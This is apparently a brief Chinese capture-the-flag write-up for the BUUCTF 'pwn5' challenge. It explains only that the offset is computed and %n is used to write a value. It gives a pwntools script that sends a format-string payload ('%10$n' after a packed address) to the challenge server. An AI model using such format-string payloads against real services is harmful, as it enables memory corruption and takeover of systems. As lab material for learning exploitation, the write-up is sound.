BUUCTF-pwn5(2/100)
一、查保护
二、代码审计
三、过程
先计算出偏移
再利用%n写入指定内容
四、脚本
from pwn import *
#context(os='linux', arch='amd64', log_level='debug')
ru=lambda x:io.recvuntil(x)
rl=lambda :io.recvline()
sla=lambda x,y:io.sendlineafter(x,y)
sl=lambda x:io.sendline(x)
#io = process('./pwn')
io=remote('node3.buuoj.cn',29432)
unk_804C044=0x804C044
payload=p32(unk_804C044)+'%10$n'
sl(payload)
io.interactive()
浙公网安备 33010602011771号